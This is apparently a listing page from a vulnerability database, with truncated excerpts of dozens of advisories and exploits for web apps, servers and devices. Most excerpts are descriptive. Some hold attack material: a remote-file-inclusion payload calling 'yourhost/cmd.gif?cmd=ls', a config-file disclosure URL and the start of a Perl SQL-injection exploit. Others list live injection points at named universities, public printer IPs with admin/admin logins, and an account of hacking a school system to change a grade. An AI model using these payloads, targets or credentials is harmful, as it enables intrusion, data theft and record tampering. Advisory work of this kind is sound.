deV!Lz Clanportal [DZCP] <= 1.3.6 - Arbitrary File Upload Vulnerability
No description provided by source. SYNOPSIS - access: remote, severity: high - deV!Lz Clanportal allows nearly arbitrary files to be uploaded and stored on the server's filesystem, which enables anyone, even without a user account, to upload PHP code and execute it,...
Microsoft IIS FTPd Service NLST Command Remote Stack Overflow Vulnerability (MS09-053)
BUGTRAQ ID: 36189 CVE ID: CVE-2009-3023 Microsoft Internet Information Services (IIS) is a network information server bundled with Microsoft Windows that includes HTTP service functionality. A stack overflow vulnerability exists in the FTP server embedded in Microsoft IIS. If a remote attacker issues an FTP NLST (NAME LIST) command containing wildcards against a directory with a specially crafted name, the overflow is triggered, leading to denial of service or arbitrary code execution. A directory with such a special name can only be created if the attacker has write access. Microsoft IIS 6.0 Microsoft IIS 5.1 Microsoft I...
MidiCart PHP Item_List.PHP MainGroup Parameter SQL Injection Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/13513/info MidiCart PHP is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. A successful exploit could allow an attacker to compromise the...
Red Hat JBoss Portal Security Bypass Vulnerability
Vulnerability details: Red Hat JBoss Portal is an open-source, standards-compliant portal platform from the US company Red Hat. The platform is used to build and lay out the web interface of a portal site, publish and manage content, and customize the user experience. A security vulnerability exists in Red Hat JBoss Portal 6.x. An attacker can exploit it to bypass security restrictions. Details: An updated package for the apache commons-collections library, which fixes one security issue, is now available for Red Hat JBoss Portal 6.2.0 from the Red Hat Customer Portal. Red Hat JBoss Portal is an open-source implementation of Java EE services and portal services running on the Red Hat JBoss Enterprise Application Platform...
tiki wiki cms groupware 5.2 - Multiple Vulnerabilities
No description provided by source. Source: http://www.securityfocus.com/bid/43507/info Tiki Wiki CMS Groupware is prone to a local file-include vulnerability and a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker can exploit the local...
Indexu 5.0/5.3 suggest_category.php error_msg Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/22084/info Indexu is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to have arbitrary script code execute in the...
Apache Tomcat HTTP Request Smuggling (CVE-2021-33037)
...
ArticleBeach Script <= 2.0 (index.php) Remote File Inclusion Vulnerability
No description provided by source. ------------------------------------------------------------------------------ ArticleBeach Script <= 2.0 (page) Remote File Inclusion Vulnerability ------------------------------------------------------------------------------ Author : Zeni Susanto a.k.a Bithedz...
Multiple vulnerabilities in Loxone Smart Home
Vendor & product description: "Loxone Electronics was founded in 2009. Our focus is the development and production of control solutions for all homes. Our aim is to make home automation interesting, affordable and accessible for everyone." URL: http://www.loxone.com/enus/company/about-us.html...
deV!Lz Clanportal [DZCP] <= 1.4.5 - Remote File Disclosure Vulnerability
No description provided by source. DZCP Devilz Clanportal <= 1.4.5 MySQL data viewable. Found by: Kiba. Solution: Install security fix! Exploit: http://SITE/PATH/inc/filebrowser/browser.php?file=inc/mysql.php Example: http://www.example.com/dzcp/inc/filebrowser/browser.php?file=inc/mysql.php...
VMware Multiple Security Vulnerabilities
BUGTRAQ ID: 30934 CVE ID: CVE-2008-3691 CVE-2008-3692 CVE-2008-3693 CVE-2008-3694 CVE-2008-3695 CVE-2008-3696 CNCVE ID: CNCVE-20083691 CNCVE-20083692 CNCVE-20083693 CNCVE-20083694 CNCVE-20083695 CNCVE-20083696 VMware is virtual PC software that allows two or more Windows, DOS or Linux systems to run simultaneously on a single machine. Multiple VMware...
deV!Lz Clanportal [DZCP] <= 1.4.9.6 Blind SQL Injection Exploit
No description provided by source. use HTTP::Cookies; use LWP::UserAgent; my $ua = LWP::UserAgent->new(cookie_jar => HTTP::Cookies->new); $ua->agent('Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9'); usage(); print "\n"; $server = $ARGV[0]; $dir = $ARGV[1]; $username = $ARGV[2]; $password = $ARGV[3]; if (!$password...
FreeBSD inet_network() Function Single-Byte Overflow Vulnerability
BUGTRAQ ID: 27283 CVE(CAN) ID: CVE-2008-0122 FreeBSD is a freely available open-source Unix-like system that runs on the Intel platform. A single-byte overflow in FreeBSD's inet_network() function can cause memory corruption with certain input; a local attacker may exploit this vulnerability to escalate privileges or cause a denial of service. If a program passes untrusted data to inet_network(), an attacker can pass specially crafted input to inet_network() to overwrite a memory region with user-controlled data. Depending on which memory region is overwritten, the attacker may cause a denial of service or code execution in a program that uses inet_network(). FreeBSD FreeBSD 7.0...
Wordpress Plugin Adserve 0.2 adclick.php SQL Injection Exploit
No description provided by source. WordPress Adserve plugin v0.2 SQL Injection Exploit. Plugin Homepage: http://www.irisco.it/?pageid=40 Found by: enterthedragon. Vulnerable code - in adclick.php: if (isset($_GET['id'])) Header("Location: " . iriAdServeBannerClick($_GET['id'])); - in the iriAdServeBannerClick function: return...
Apache 'mod_isapi' Memory Corruption Vulnerability
CVE: CVE-2010-0425 Apache is prone to a memory-corruption vulnerability. Attackers can leverage this vulnerability to execute arbitrary code with SYSTEM privileges; failed attacks may result in denial-of-service conditions. Apache versions prior to 2.2.15 are affected. Slackware Linux x86_64 -curre...
Pyrophobia 2.1.3.1 modules/out.php id Parameter XSS
No description provided by source. source: http://www.securityfocus.com/bid/22667/info Pyrophobia is prone to multiple input-validation vulnerabilities, including multiple local file-include issues and multiple cross-site scripting issues. An attacker can exploit these issues to steal cookie-base...
Huatian Dongli OA System Weak Password Plus Arbitrary File Upload Compromises the Server in Seconds
Brief description: Weak password plus arbitrary file upload in the Huatian Dongli OA system compromises the server in seconds. Detailed description: The Huatian Dongli OA system ships with a default weak-password user; after logging in as that user, arbitrary files can be uploaded to obtain a shell directly, and because the system database runs as root with high privileges, the server is fully compromised. Proof of vulnerability: 1. Download the latest Huatian OA http://software.oa8000.com/download/Version/V7.0/11-TAMYSQL5D-%E8%AF%95%E7%94%A8%E7%89%88%E5%B8%A6%E6%95%B0%E6%8D%AE%E4%B8%89%E5%90%88%E4%B8%80MYSQLPUE-7.0-2015-06-29.e...
Qiangzhi Technology Educational Administration System SQL Injection Vulnerability Affects Multiple Universities...
Brief description: The Qiangzhi Technology educational administration system has an SQL injection vulnerability; multiple universities are affected... Detailed description: Does this count as a CMS? Affected universities and injection points: Hunan University of Commerce: http://jwgl.hnuc.edu.cn/Public/ShowGGTZ.asp?GGTZID=317 [here] Beijing City University: http://114.255.66.248/jiaowu/Public/ShowGGTZ.asp?GGTZID=218 [here] Jiaozuo University: http://jw.jzu.cn/jiaowu/Public/ShowGGTZ.asp?GGTZID=1155 [here]...
Kingdee Collaborative Office System GETSHELL Vulnerability
Brief description: Detailed description: The Kingdee OA system configures a servlet Connector in web.xml that is based on an old version of fckeditor and has an arbitrary file upload vulnerability; the configuration is as follows: The main code decompiled from com.fredck.FCKeditor.connector.ConnectorServlet.class is as follows: public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException …… String commandStr =...
ESRI ArcGIS Unspecified SQL Injection Vulnerability
CVE ID: CVE-2013-7232 The ArcGIS for Server software platform lets users create, manage and distribute GIS services over the network, supporting desktop applications, mobile applications and web mapping applications in the form of services. ArcGIS for Server has an unspecified SQL injection vulnerability that allows a remote attacker to submit specially crafted SQL queries to manipulate or obtain database data. The vulnerability is related to map input. 0 ESRI ArcGIS for Server 10.2 Vendor patch: ESRI ----- Users can refer to the following vendor security advisory for patch information:...
Qiangzhi Technology Educational Administration System Injection Vulnerability Allows Grades to Be Changed
Brief description: I was bored yesterday, so I went to have a look at the educational administration office of a friend's university, thinking I might be able to help him change a failed grade. Detailed description: I saw it was something called the Qiangzhi Technology educational administration system; Google showed vulnerabilities had been disclosed before. POST injection in the login form. MSSQL database. I tried it; not sure what the problem was, I switched between several tools and none could read the table names. It showed sa, but restoring xp_cmdshell failed and executing commands failed. With no other option I put it into Jsky to scan and was pleasantly surprised to find the site source code. I downloaded it and found the educational administration system has a pretty useless BBS that basically nobody logs into. The BBS admin password defaults to the educational administrator's password, but is stored in another table in plaintext. Great. First register a user on the forum, then inject manually to dump the admin account and password, and get into the backend smoothly...
Linux Kernel 2.4/2.6 - sock_sendpage() Local Root Exploit (PPC Edition)
No description provided by source. /* Linux sock_sendpage NULL pointer dereference. Copyright 2009 Ramon de Carvalho Valle [email protected] This program is free software; you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Softwar...
Tongda OA Arbitrary File Upload Vulnerability
No description provided by source...
ETERNALBLUE - Remote RCE via SMB & NBT (Windows XP to Windows 2012)
From the Shadow Brokers leak: a Windows XP to Windows 2012 SMB remote code execution vulnerability, code-named ETERNALBLUE. CVE-2017-0143 CVE-2017-0144 CVE-2017-0145 CVE-2017-0146 CVE-2017-0147 CVE-2017-0148 Reference:...
HPE Integrated Lights-Out 4 Remote Code Execution Vulnerability(CVE-2017-12542)
Subverting your server through its BMC: the HPE iLO4 case ========================================================= Introduction ------------ iLO is the server management solution embedded in almost every HP server for more than 10 years. It provides every feature required by a system...
"Phoenix Talon" in Linux Kernel (Phoenix Talon)
About "Phoenix Talon": On May 9, 2017, Venustech (Qiming Xingchen) ADLab found a remote vulnerability in the Linux kernel named "Phoenix Talon" (the name refers to the fourth toe of a phoenix's claw), covering CVE-2017-8890, CVE-2017-9075, CVE-2017-9076 and CVE-2017-9077, which can affect almost all Linux kernels from 2.5.69 Linux...
PHPExcel XML External Entity Processing Vulnerability
CVE ID: CVE-2014-2054 PHPExcel is a PHP class library for working with Office Excel documents, based on Microsoft's OpenXML standard and the PHP language. PHPExcel has an error when parsing XML entities that allows an attacker to submit an XML document containing external entity references and obtain the contents of system files. 0 PHPExcel 1.x PHPExcel 1.8.0 has fixed this vulnerability; users are advised to download the update: https://github.com/PHPOffice/PHPExce...
Apache HTTP Server Multiple Denial of Service Vulnerabilities
BUGTRAQ ID: 66303 CVE ID: CVE-2013-6438, CVE-2014-0098 Apache HTTP Server is an open-source HTTP server. Apache HTTP Server 2.4.7, 2.4.6, 2.4.4, 2.4.3, 2.4.2 and 2.4.1 have implementation flaws that can be maliciously exploited to cause a denial of service. 1. When logging truncated cookies, the mod_log_config module has an error that can be exploited to crash a worker thread; successful exploitation requires a threaded MPM. 2. When removing leading spaces, the mod_dav module has a boundary error that can be exploited to corrupt memory via a specially crafted DAV WRITE request. 0 Apache Gro...
Synology DiskStation Manager Remote Command Execution Vulnerability
CVE ID: CVE-2013-6955 Synology DiskStation Manager is the first NAS operating system to provide a web-based multitasking user interface. The vulnerability is located in /webman/imageSelector.cgi and allows an attacker to execute arbitrary commands with root privileges. 0 Synology DiskStation Manager 4.x The vendor has not yet provided a patch or upgrade; we recommend that users of this software monitor the vendor's home page for the latest version: http://www.synology.com This module requires Metasploit: http://metasploit.com/downlo...
Guowei CMS (formerly PHP168) SQL Injection Vulnerability
The system is called with the following parameters: ask/item-confirm-category-8.html, where item is the directory and confirm is the file under that directory. ask/modules/item/confirm.php: $keyword = isset($_GET['keyword']) ? rawurldecode($_GET['keyword']) : ''; if (empty($keyword)) message('ask_error', HTTP_REFERER, 3); The keyword variable is taken from GET and then urldecoded. $select = select; $select->from($this->module->table . ' ...
74cms Latest Version Injection 8-9
Brief description: Knight (骑士) PHP recruitment system: 74cms V3.4.20140530 Detailed description: In GBK a Chinese character is 2 bytes; in UTF-8 it is 3 bytes. When 74cms reads from the database it sets character_set_client=binary, so a wide-byte injection cannot be done directly; you have to find places that convert encodings. 錦 converted from UTF-8 to GBK becomes %e5%5c. 74cms applies addslashes to GET, POST, COOKIE, etc., so ' is escaped to \' (%5C). With %e5%5c%5c' there are two backslashes, and the single quote comes out intact. Now look at the global filtering in 74cms: function remove_xss($string) $string =...
OpenSSH <=7.2p1 xauth injection
Source link: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 VuNote Author: Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-3115 Version: 0.2 Date: Mar 3rd, 2016 Tag: openssh xauth command injection may lead to forced-command and /bin/false bypass Overview Name: openssh...
UCenter Home 2.0 and Below Stored XSS
Brief description: From now on Tencent's vulnerabilities will be posted on WooYun. Detailed description: [Vulnerability principle] The editor's insert-video input is not strictly filtered, so posts in the blog and group modules can include code. [Test code] Post containing the following code: flashhttp://"...
Microsoft IIS Password Information Disclosure Vulnerability (MS12-073)
BUGTRAQ ID: 56439 CVE ID: CVE-2012-2531 Internet Information Services (IIS) is the basic Internet service provided by Microsoft for systems running Microsoft Windows. Microsoft IIS 7.5 uses weak permissions on operational logs and does not properly restrict access to certain log files; by reading these files a local user can obtain the usernames and passwords of configured accounts. Exploiting this vulnerability requires IIS operational logging to be enabled. 0 Microsoft IIS 7.x Workaround: If the IIS "Operational" log is already enabled, then before assigning a custom account to an application pool, disable...
MySQL <= 5.7.15 remote Root code execution vulnerability
http://legalhackers.com - dawid at legalhackers.com - Release date: 12.09.2016 I. VULNERABILITY ------------------------- MySQL <= 5.7.15 Remote Root Code Execution / Privilege Escalation 0day (5.6.33, 5.5.52). MySQL clones are also affected, including: MariaDB, PerconaDB II. BACKGROUND...
Multiple Vendors libc/glob(3) Resource Exhaustion (+0day remote ftpd-anon)
No description provided by source. Source: http://securityreason.com/securityalert/7822 -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Multiple Vendors libc/glob(3) resource exhaustion (+0day remote ftpd-anon) Author: Maksymilian Arciemowicz http://netbsd.org/donations/ http://securityreason.com/...
Vegetav (news_item.php?id) Remote SQL injection Vulnerability
No description provided by source. IRANIAN THE BEST HACKERS IN THE WORLD Remote SQL injection Vulnerability Vegetav (news_item.php?id) AuTh0r : EhsanHp200 H0ME : www.ehsanhp.blogsky.com Email : [email protected] Vendor : http://www.vegetav.co.uk/ Persian Gulf 4 Ever! Dork : "website design by...
Aardvark Topsites PHP <= 4.2.2 (path) Remote File Inclusion Vuln
No description provided by source. Title: Aardvark Topsites PHP <= 4.2.2 remote file inclusion URL: http://www.aardvarktopsitesphp.com/ Dork: "Powered By Aardvark Topsites PHP 4.2.2" Exploit: /sources/join.php?FORM[url]=owned&CONFIG[captcha]=1&CONFIG[path]=http://yourhost/cmd.gif?cmd=ls milw0rm.com...
OpenSSH Information Leak Vulnerability (CVE-2016-10011)
No description provided by source...
AppWeb Authentication Bypass (Digest, Basic and Forms)(CVE-2018-8715)
Vulnerability Summary: A critical vulnerability exists in the EmbedThis HTTP library and in Appweb versions 5.5.x, 6.x and 7.x, including the latest version present in the git repository. In detail, due to a logic flaw, a forged HTTP request makes it possible to bypass authentication for form and...
Canon MF8040Cn Printer Weak Password
Canon MF8040Cn printer weak password 1. dork: app:"Canon i-SENSYS MF8040Cn printer http admin" 2. Vulnerability details: The Canon MF8040Cn printer has default account credentials 1) System administrator mode: admin / admin 2) End-user mode: admin 3. Proof of vulnerability: Search on ZoomEye: app:"Canon i-SENSYS MF8040Cn printer http admin" A large number of devices are exposed on the public Internet http://223.197.235.193 http://219.142.195.251 Logging in with admin / admin succeeds, and printer information can be viewed...
Microsoft IIS ASP Remote Code Execution Vulnerability (MS08-006)
BUGTRAQ ID: 27676 CVE(CAN) ID: CVE-2008-0075 Microsoft Internet Information Services (IIS) is a network information server bundled with Microsoft Windows that includes HTTP service functionality. A remote code execution vulnerability exists in the way IIS handles input to ASP web pages, allowing an attacker to send malicious input to a website's ASP pages. An attacker who successfully exploits this vulnerability can perform arbitrary actions on the IIS server with the privileges of the WPI (the Network Service account in the default configuration). Microsoft IIS 6.0 Microsoft IIS 5.1 Workaround: Disable classic-style ASP on Windows Server 2003: 1...
Jolokia Vulnerabilities - RCE & XSS(CVE-2018-1000130,CVE-2018-1000129)
Recently, during a client engagement, Gotham Digital Science found a couple of zero-day vulnerabilities in the Jolokia service. Jolokia is an open source product that provides an HTTP API interface for JMX (Java Management Extensions) technology. It contains an API we can use for calling MBeans...
Exim 4 Remote Code Execution Vulnerability (CVE-2020-28018)
CVE-2020-28018: Exim Use-after-free (UAF) leading to RCE Introduction There exists a use-after-free (UAF) vulnerability in tls-openssl.c that allows remote unauthenticated attackers to corrupt internal memory data, ultimately achieving remote code execution. Primitives: - [x] Memory Leakage - [x]...
Pre-auth Remote Code Execution exploit for QNAP QTS
#!/usr/bin/env python # -*- coding: iso-8859-15 -*- Pre-auth Remote Code Execution exploit for QNAP QTS 4.2.6 build 20171026, 4.3.3.0378 build 20171117, 4.3.4.0387 Beta 2 build 2017111 Just a quick dirty RCE PoC to make your QNAP sing "XMAS" in morse. Author: Andrea Palazzo @cogitoergor00t E-mail:...
Oracle WebLogic wls-wsat RCE (CVE-2017-10271)
Vulnerability description: Attackers are using the WebLogic deserialization vulnerability (CVE-2017-3248) and the WebLogic WLS component vulnerability (CVE-2017-10271) to launch large-scale remote attacks against enterprise servers; a large number of enterprise servers have been compromised, and the number of affected enterprises is clearly rising, which warrants close attention. Among them, CVE-2017-10271 is the latest remote code execution vulnerability in the WLS component of Oracle WebLogic, an in-the-wild exploited vulnerability with no public details, and many enterprises have not yet installed the patch. The vendor released a patch for this vulnerability in October 2017. The vulnerability is relatively simple to exploit: an attacker only needs to send a carefully crafted HTTP...
IIS 6.0 WebDAV remote code execution vulnerability (CVE-2017-7269)
In Windows Server 2003 IIS 6.0, the WebDAV service's ScStoragePathFromUrl function has a buffer overflow vulnerability; an attacker can achieve arbitrary code execution through a PROPFIND request carrying an overly long header that begins with "If: <http://". Currently the vulnerability affects installations of IIS 6...
Apache Tomcat Upload Bypass / Remote Code Execution(CVE-2017-12617)
CVE-2017-12617: A critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat affects systems with HTTP PUT enabled by setting the "read-only" initialization parameter of the Default servlet to "false". Tomcat versions before 9.0.1 Beta, 8.5.23, 8.0.47 a...
lighttpd 'mod_mysql_vhost.c' SQL Injection Vulnerability
BUGTRAQ ID: 66153 CVE(CAN) ID: CVE-2014-2323 Lighttpd is a lightweight open-source web server package. Because the program fails to sufficiently filter user-supplied input before performing SQL queries, an attacker can exploit the vulnerability to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. 0 lighttpd 1.4.35 The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page: http://www.lighttpd.net...
Randombit Botan Library X509 Certificate Validation Bypass Vulnerability(CVE-2017-2801)
Summary: A programming error exists in the way the Randombit Botan cryptographic library version 2.0.1 implements X.500 string comparisons, which could lead to certificate verification issues and abuse. A specially crafted X509 certificate would need to be delivered to the client or server application in...